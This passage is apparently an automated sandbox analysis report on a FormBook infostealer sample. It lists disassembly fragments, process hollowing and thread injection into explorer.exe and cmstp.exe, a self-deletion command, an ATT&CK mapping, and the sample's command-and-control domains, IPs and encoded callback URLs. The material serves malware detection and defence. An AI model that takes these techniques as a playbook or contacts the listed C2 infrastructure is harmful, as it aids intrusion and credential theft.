          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04918794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04911B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04911B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04904F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04904F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04933B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04933B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\20210113432.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\20210113432.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.28 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\20210113432.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3292
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\20210113432.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\20210113432.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: DE0000
          Source: C:\Users\user\Desktop\20210113432.exeProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'
          Source: explorer.exe, 00000003.00000000.258758513.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000003.00000002.623472452.0000000005F40000.00000004.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.258758513.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.607576651.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000003.00000000.258758513.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Users\user\Desktop\20210113432.exe VolumeInformation
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\20210113432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339348 Sample: 20210113432.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 7 other signatures 2->42 10 20210113432.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\20210113432.exe.log, ASCII 10->28 dropped 52 Tries to detect virtualization through RDTSC time measurements 10->52 14 20210113432.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.fordexplorerproblems.com 74.208.236.28, 49757, 80 ONEANDONE-ASBrauerstrasse48DE United States 17->30 32 exoticorganicwine.com 34.102.136.180, 49756, 49759, 80 GOOGLEUS United States 17->32 34 7 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 cmstp.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          20210113432.exe28%VirustotalBrowse
          20210113432.exe26%ReversingLabsByteCode-MSIL.Trojan.Taskun
          20210113432.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.20210113432.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.exoticorganicwine.com/dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://tempuri.org/_391backDataSet.xsd0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.southsideflooringcreations.com/dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg==0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.miproper.com/dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ==0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          miproper.com
          34.102.136.180
          truetrue
            unknown
            southsideflooringcreations.com
            184.168.131.241
            truetrue
              unknown
              exoticorganicwine.com
              34.102.136.180
              truetrue
                unknown
                www.fordexplorerproblems.com
                74.208.236.28
                truetrue
                  unknown
                  www.semaindustrial.com
                  unknown
                  unknowntrue
                    unknown
                    www.southsideflooringcreations.com
                    unknown
                    unknowntrue
                      unknown
                      www.miproper.com
                      unknown
                      unknowntrue
                        unknown
                        www.exoticorganicwine.com
                        unknown
                        unknowntrue
                          unknown
                          www.trinewstyles.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.exoticorganicwine.com/dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLBtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.southsideflooringcreations.com/dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg==true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.miproper.com/dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ==true
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.623532384.0000000006870000.00000004.00000001.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.comexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                        high
                                        http://tempuri.org/_391backDataSet.xsd20210113432.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.tiro.comexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.goodfont.co.krexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.comexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fonts.comexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.sakkal.comexplorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    34.102.136.180
                                                    unknownUnited States
                                                    15169GOOGLEUStrue
                                                    184.168.131.241
                                                    unknownUnited States
                                                    26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                    74.208.236.28
                                                    unknownUnited States
                                                    8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:339348
                                                    Start date:13.01.2021
                                                    Start time:21:25:27
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 11m 26s
                                                    Hypervisor based Inspection enabled:false
